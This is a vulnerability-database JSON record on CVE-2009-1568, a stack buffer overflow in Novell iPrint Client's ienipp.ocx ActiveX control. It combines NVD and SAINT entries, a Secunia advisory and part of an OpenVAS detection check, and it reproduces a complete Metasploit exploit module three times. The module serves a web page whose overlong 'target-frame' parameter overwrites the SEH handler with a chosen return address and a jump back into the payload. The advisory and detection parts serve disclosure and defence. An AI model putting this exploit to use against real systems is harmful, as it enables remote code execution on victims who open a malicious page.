Novell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named **ienipp.ocx**.
Problem
A buffer overflow in **ienipp.ocx** allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter.
{"enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2016-10-03T15:01:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1568"]}, {"type": "exploitdb", "idList": ["EDB-ID:16523"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:85993", "PACKETSTORM:86591"]}, {"type": "saint", "idList": ["SAINT:7129981AE8D7D97AF5751954062566D3", "SAINT:CED464C320FB37AD3E8A72FAC1DB68DD"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10447", "SECURITYVULNS:DOC:22874"]}, {"type": "nessus", "idList": ["NOVELL_IPRINT_532.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:900728", "OPENVAS:1361412562310900728", "OPENVAS:900729", "OPENVAS:1361412562310900729"]}, {"type": "seebug", "idList": ["SSV:15060"]}], "modified": "2016-10-03T15:01:58", "rev": 2}, "vulnersScore": 9.3}, "reporter": "SAINT Corporation", "id": "SAINT:DC7242B4E001383B596631DCD787D66F", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2010-01-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "modified": "2010-01-12T00:00:00", "references": [], "cvelist": ["CVE-2009-1568"], "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. \n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. \n\n### Platforms\n\nWindows XP \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "lastseen": "2016-10-03T15:01:58", "edition": 1, "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow"}
{"cve": [{"lastseen": "2021-02-02T05:40:01", "description": "Stack-based buffer overflow in ienipp.ocx in Novell iPrint Client 5.30, and possibly other versions before 5.32, allows remote attackers to execute arbitrary code via a long target-frame parameter.", "edition": 4, "cvss3": {}, "published": "2009-12-08T23:30:00", "title": "CVE-2009-1568", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1568"], "modified": "2018-10-10T19:37:00", "cpe": ["cpe:/a:novell:iprint_client:5.30", "cpe:/a:novell:iprint_client:5.31"], "id": "CVE-2009-1568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1568", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:novell:iprint_client:5.30:*:*:*:*:*:*:*", "cpe:2.3:a:novell:iprint_client:5.31:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. \n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2010-01-12T00:00:00", "published": "2010-01-12T00:00:00", "id": "SAINT:CED464C320FB37AD3E8A72FAC1DB68DD", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "edition": 2, "description": "Added: 01/12/2010 \nCVE: [CVE-2009-1568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568>) \nBID: [37242](<http://www.securityfocus.com/bid/37242>) \nOSVDB: [60803](<http://www.osvdb.org/60803>) \n\n\n### Background\n\nNovell iPrint is an application which allows users to install and manage printers. Novell iPrint installs the Novell iPrint Control ActiveX control named `**ienipp.ocx**`. \n\n### Problem\n\nA buffer overflow in `**ienipp.ocx**` allows command execution when a user opens a specially crafted page which invokes the Novell iPrint Client ActiveX control with a specially crafted target-frame parameter. \n\n### Resolution\n\nUpgrade to [iPrint Client version 5.3.2](<http://download.novell.com/Download?buildid=29T3EFRky18~>) or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2009-40/> \n\n\n### Limitations\n\nExploit works on Novell iPrint Client 5.30.00. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2010-01-12T00:00:00", "published": "2010-01-12T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/novell_iprint_ienipp_target_frame", "id": "SAINT:7129981AE8D7D97AF5751954062566D3", "type": "saint", "title": "Novell iPrint Client ienipp.ocx target-frame buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:04", "description": "", "published": "2010-02-24T00:00:00", "type": "packetstorm", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-02-24T00:00:00", "id": "PACKETSTORM:86591", "href": "https://packetstormsecurity.com/files/86591/Novell-iPrint-Client-ActiveX-Control-target-frame-Buffer-Overflow.html", "sourceData": "`## \n# $Id: novelliprint_target_frame.rb 8605 2010-02-23 18:06:35Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell iPrint Client 5.30. When \npassing an overly long string via the \"target-frame\" parameter to ienipp.ocx \nan attacker can execute arbitrary code. \n \nNOTE: The \"operation\" variable must be set to a valid command in order to reach this \nvulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 8605 $', \n'References' => \n[ \n[ 'CVE', '2009-1568' ], \n[ 'BID', '37242' ], \n[ 'OSVDB', '60803' ], \n[ 'URL', 'http://secunia.com/advisories/37169/' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1456, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30 \n], \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \nsploit = p.encoded \n \n# the following must be an invalid pointer (unreadable) \nsploit << [rand(0xffffffff) | 0xc0000000].pack('V') \n \nsploit << generate_seh_record(target.ret) \n \ndistance = 8 + 4 + payload_space \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \nsploit << rand_text_alphanumeric(2048 - sploit.length) \n \noperations = [ \n\"op-client-interface-version\", \n\"op-client-version-info\", \n\"op-client-is-printer-installed\", \n\"op-user-get-role\", \n\"op-printer-install\", \n\"op-printer-remove\", \n\"op-printer-get-status\", \n\"op-printer-get-info\", \n\"op-printer-pause\", \n\"op-printer-resume\", \n\"op-printer-purge-jobs\", \n\"op-printer-list-users-jobs\", \n\"op-printer-list-all-jobs\", \n\"op-printer-send-test-page\", \n\"op-printer-send-file\", \n\"op-printer-setup-install\", \n\"op-job-get-info\", \n\"op-job-hold\", \n\"op-job-release-hold\", \n\"op-job-cancel\", \n\"op-job-restart\", \n\"op-dbg-printer-get-all-attrs\", \n\"op-dbg-job-get-all-attrs\" \n] \noperation = operations[rand(operations.length)] \n \n# escape single quotes \nsploit = xml_encode(sploit) \n \ncontent = %Q|<html> \n<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'> \n<param name='operation' value='#{operation}' /> \n<param name='target-frame' value='#{sploit}' /> \n</object> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \ndef xml_encode(str) \nret = \"\" \nstr.unpack('C*').each { |ch| \ncase ch \nwhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39 \nret << ch.chr \nelse \nret << \"&#x\" \nret << ch.chr.unpack('H*')[0] \nret << \";\" \nend \n} \nret \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86591/novelliprint_target_frame.rb.txt"}, {"lastseen": "2016-12-05T22:19:31", "description": "", "published": "2010-02-06T00:00:00", "type": "packetstorm", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-02-06T00:00:00", "id": "PACKETSTORM:85993", "href": "https://packetstormsecurity.com/files/85993/Novell-iPrint-Client-ActiveX-Control-target-frame-Buffer-Overflow.html", "sourceData": "`## \n# $Id: novelliprint_target-frame.rb 8338 2010-02-01 03:33:38Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell iPrint Client 5.30. When \npassing an overly long string via the \"target-frame\" parameter to ienipp.ocx \nan attacker can execute arbitrary code. \n \nNOTE: The \"operation\" variable must be set to a valid command in order to reach this \nvulnerability. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 8338 $', \n'References' => \n[ \n[ 'CVE', '2009-1568' ], \n[ 'BID', '37242' ], \n[ 'OSVDB', '60803' ], \n[ 'URL', 'http://secunia.com/advisories/37169/' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1456, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30 \n], \n'DisclosureDate' => 'Dec 08 2009', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \nsploit = p.encoded \n \n# the following must be an invalid pointer (unreadable) \nsploit << [rand(0xffffffff) | 0xc0000000].pack('V') \n \nsploit << generate_seh_record(target.ret) \n \ndistance = 8 + 4 + payload_space \nsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \nsploit << rand_text_alphanumeric(2048 - sploit.length) \n \noperations = [ \n\"op-client-interface-version\", \n\"op-client-version-info\", \n\"op-client-is-printer-installed\", \n\"op-user-get-role\", \n\"op-printer-install\", \n\"op-printer-remove\", \n\"op-printer-get-status\", \n\"op-printer-get-info\", \n\"op-printer-pause\", \n\"op-printer-resume\", \n\"op-printer-purge-jobs\", \n\"op-printer-list-users-jobs\", \n\"op-printer-list-all-jobs\", \n\"op-printer-send-test-page\", \n\"op-printer-send-file\", \n\"op-printer-setup-install\", \n\"op-job-get-info\", \n\"op-job-hold\", \n\"op-job-release-hold\", \n\"op-job-cancel\", \n\"op-job-restart\", \n\"op-dbg-printer-get-all-attrs\", \n\"op-dbg-job-get-all-attrs\" \n] \noperation = operations[rand(operations.length)] \n \n# escape single quotes \nsploit = xml_encode(sploit) \n \ncontent = %Q|<html> \n<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'> \n<param name='operation' value='#{operation}' /> \n<param name='target-frame' value='#{sploit}' /> \n</object> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \ndef xml_encode(str) \nret = \"\" \nstr.unpack('C*').each { |ch| \ncase ch \nwhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39 \nret << ch.chr \nelse \nret << \"&#x\" \nret << ch.chr.unpack('H*')[0] \nret << \";\" \nend \n} \nret \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85993/novelliprint_target-frame.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T00:03:34", "description": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow. CVE-2009-1568. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16523", "href": "https://www.exploit-db.com/exploits/16523/", "sourceData": "##\r\n# $Id: novelliprint_target_frame.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\r\n\t\t\t\tpassing an overly long string via the \"target-frame\" parameter to ienipp.ocx\r\n\t\t\t\tan attacker can execute arbitrary code.\r\n\r\n\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\r\n\t\t\t\tvulnerability.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-1568' ],\r\n\t\t\t\t\t[ 'BID', '37242' ],\r\n\t\t\t\t\t[ 'OSVDB', '60803' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/advisories/37169/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1456,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 08 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tsploit = p.encoded\r\n\r\n\t\t# the following must be an invalid pointer (unreadable)\r\n\t\tsploit << [rand(0xffffffff) | 0xc0000000].pack('V')\r\n\r\n\t\tsploit << generate_seh_record(target.ret)\r\n\r\n\t\tdistance = 8 + 4 + payload_space\r\n\t\tsploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\tsploit << rand_text_alphanumeric(2048 - sploit.length)\r\n\r\n\t\toperations = [\r\n\t\t\t\"op-client-interface-version\",\r\n\t\t\t\"op-client-version-info\",\r\n\t\t\t\"op-client-is-printer-installed\",\r\n\t\t\t\"op-user-get-role\",\r\n\t\t\t\"op-printer-install\",\r\n\t\t\t\"op-printer-remove\",\r\n\t\t\t\"op-printer-get-status\",\r\n\t\t\t\"op-printer-get-info\",\r\n\t\t\t\"op-printer-pause\",\r\n\t\t\t\"op-printer-resume\",\r\n\t\t\t\"op-printer-purge-jobs\",\r\n\t\t\t\"op-printer-list-users-jobs\",\r\n\t\t\t\"op-printer-list-all-jobs\",\r\n\t\t\t\"op-printer-send-test-page\",\r\n\t\t\t\"op-printer-send-file\",\r\n\t\t\t\"op-printer-setup-install\",\r\n\t\t\t\"op-job-get-info\",\r\n\t\t\t\"op-job-hold\",\r\n\t\t\t\"op-job-release-hold\",\r\n\t\t\t\"op-job-cancel\",\r\n\t\t\t\"op-job-restart\",\r\n\t\t\t\"op-dbg-printer-get-all-attrs\",\r\n\t\t\t\"op-dbg-job-get-all-attrs\"\r\n\t\t]\r\n\t\toperation = operations[rand(operations.length)]\r\n\r\n\t\t# escape single quotes\r\n\t\tsploit = xml_encode(sploit)\r\n\r\n\t\tcontent = %Q|<html>\r\n<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'>\r\n<param name='operation' value='#{operation}' />\r\n<param name='target-frame' value='#{sploit}' />\r\n</object>\r\n</html>\r\n|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef xml_encode(str)\r\n\t\tret = \"\"\r\n\t\tstr.unpack('C*').each { |ch|\r\n\t\t\tcase ch\r\n\t\t\twhen 0x41..0x5a, 0x61..0x7a, 0x30..0x39\r\n\t\t\t\tret << ch.chr\r\n\t\t\telse\r\n\t\t\t\tret << \"&#x\"\r\n\t\t\t\tret << ch.chr.unpack('H*')[0]\r\n\t\t\t\tret << \";\"\r\n\t\t\tend\r\n\t\t}\r\n\t\tret\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16523/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1568"], "description": "====================================================================== \r\n\r\n Secunia Research 08/12/2009\r\n\r\n - Novell iPrint Client "target-frame" Parameter Buffer Overflow -\r\n\r\n====================================================================== \r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nVendor's Description of Software.....................................3\r\nDescription of Vulnerability.........................................4\r\nSolution.............................................................5\r\nTime Table...........................................................6\r\nCredits..............................................................7\r\nReferences...........................................................8\r\nAbout Secunia........................................................9\r\nVerification........................................................10\r\n\r\n====================================================================== \r\n1) Affected Software \r\n\r\n* Novell iPrint Client 5.30\r\n\r\nNOTE: Other versions may also be affected.\r\n\r\n====================================================================== \r\n2) Severity \r\n\r\nRating: Highly critical\r\nImpact: System compromise\r\nWhere: Remote\r\n\r\n====================================================================== \r\n3) Vendor's Description of Software \r\n\r\n"Novell iPrint extends print services securely across multiple \r\nnetworks and operating systems. Using proven Internet technologies, \r\niPrint transforms your Novell Distributed Print Services\u2122 (NDPS\u00ae) \r\nprinters into Net-enabled printers, making all your printing resources\r\ninstantly accessible with a Web browser and a few mouse clicks".\r\n\r\nProduct Link:\r\nhttp://www.novell.com/products/openenterpriseserver/iprint.html\r\n\r\n====================================================================== \r\n4) Description of Vulnerability\r\n\r\nSecunia Research has discovered a vulnerability in Novell iPrint \r\nClient, which can be exploited by malicious people to compromise a\r\nuser's system.\r\n\r\nThe vulnerability is caused by a boundary error in ienipp.ocx when \r\nparsing the "target-frame" parameter and can be exploited to cause a\r\nstack-based buffer overflow via an overly long parameter value.\r\n\r\nSuccessful exploitation allows execution of arbitrary code when a user\r\ne.g. views a malicious web page.\r\n\r\n====================================================================== \r\n5) Solution \r\n\r\nUpdate to version 5.32.\r\n\r\n====================================================================== \r\n6) Time Table \r\n\r\n02/11/2009 - Vendor notified.\r\n03/11/2009 - Vendor response.\r\n08/12/2009 - Public disclosure.\r\n\r\n====================================================================== \r\n7) Credits \r\n\r\nDiscovered by Carsten Eiram, Secunia Research.\r\n\r\n====================================================================== \r\n8) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \r\nCVE-2009-1568 for the vulnerability.\r\n\r\n====================================================================== \r\n9) About Secunia\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private \r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the \r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n====================================================================== \r\n10) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2009-40/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================", "edition": 1, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "SECURITYVULNS:DOC:22874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22874", "title": "Secunia Research: Novell iPrint Client "target-frame" Parameter Buffer Overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "Buffer overflows in ActiveX.", "edition": 1, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "SECURITYVULNS:VULN:10447", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10447", "title": "Novell iPrint Client multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:14:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.", "modified": "2017-01-27T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:900728", "href": "http://plugins.openvas.org/nasl.php?oid=900728", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_novell_iprint_client_mult_bof_vuln_lin.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation lets the remote attacker have a control over\n the remote system registers allowing execution of malformed shellcode.\n Impact Level: System\";\ntag_affected = \"Novell iPrint Client version prior to 5.32\";\ntag_insight = \"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\";\ntag_solution = \"Upgrade Novell iPrint Client version to 5.32\n http://download.novell.com\";\ntag_summary = \"This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900728);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_lin.nasl\");\n script_require_keys(\"Novell/iPrint/Client/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37169\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name : \"URL\" , value : \"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name : \"URL\" , value : 